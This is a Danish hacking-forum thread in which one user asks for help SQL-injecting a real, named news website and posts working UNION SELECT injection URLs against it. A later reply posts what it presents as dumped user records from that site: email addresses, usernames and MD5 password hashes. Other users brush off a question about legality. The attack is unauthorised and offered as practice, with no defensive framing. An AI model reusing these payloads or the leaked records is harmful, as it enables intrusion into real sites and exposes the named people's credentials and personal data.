Shellsec

Shellsec > Hacking > Penetration Testing > Diskussion > Mangler Hjælp Sqli -> dagbladene.dk
Fuld version: Mangler Hjælp Sqli -> dagbladene.dk
Du ser lige nu en skrabet udgave af vores indhold. Se den fulde version med ordentlig formatering.

kiksen

20-06-2015, 09:59
Hej.
Jeg har ikke oplevet dette før.
Jeg er i gang med at sql injecte denne side: http://www.dagbladene.dk/

Liste over tables:
Kode:
http://www.dagbladene.dk/index.php?mod=news&area=1&id=282 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--


Hvis jeg spørger efter db_mod_users vil den ikke.
Kode:
http://www.dagbladene.dk/index.php?mod=news&area=1&id=282 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=0x64625f6d6f645f7573657273--

Det sjove det er jeg godt kan få nogle af de andre til at virke, men ikke denne. Nogle der kan hjælpe?

h40xer

03-05-2017, 13:56
Nemt... db:

afbrandt@dagbladene.dk 83368033 brandt e10adc3949ba59abbe56e057f20f883e
info@propeople.dk 1 propeople a5dd9cecc682a68ec6559e7e73c6afc9
red@dagbladene.dk 72436378 Redaktion e10adc3949ba59abbe56e057f20f883e
-1 Anonymous

ARIGVNIN

03-05-2017, 17:18
Undskyld jeg spørger, men er det ikke ulovligt at ligefrem hacke andre hjemmesider?

Prepar3d

03-05-2017, 17:44
(03-05-2017, 17:18)ARIGVNIN Skrev: [ -> ]Undskyld jeg spørger, men er det ikke ulovligt at ligefrem hacke andre hjemmesider?

Du får et gæt, så skal jeg nok fortælle dig om det rigtigt eller forkert :)

Cronick

03-05-2017, 22:21
(03-05-2017, 17:18)ARIGVNIN Skrev: [ -> ]Undskyld jeg spørger, men er det ikke ulovligt at ligefrem hacke andre hjemmesider?

Mærkeligt spørgsmål vivivi tbh.
Shellsec > Hacking > Penetration Testing > Diskussion > Mangler Hjælp Sqli -> dagbladene.dk